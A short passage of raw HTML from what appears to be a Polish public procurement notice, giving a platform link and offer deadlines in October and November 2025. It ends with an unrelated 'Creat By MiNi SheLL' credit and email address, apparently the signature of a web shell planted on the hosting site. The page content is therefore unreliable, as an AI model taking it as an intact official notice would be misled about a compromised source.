zamówień publicznych dostępnej pod adresem: https://gwkroczyce.e-zp.finn.pl/procurements/108/procurement</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-10-03 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-11-01</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com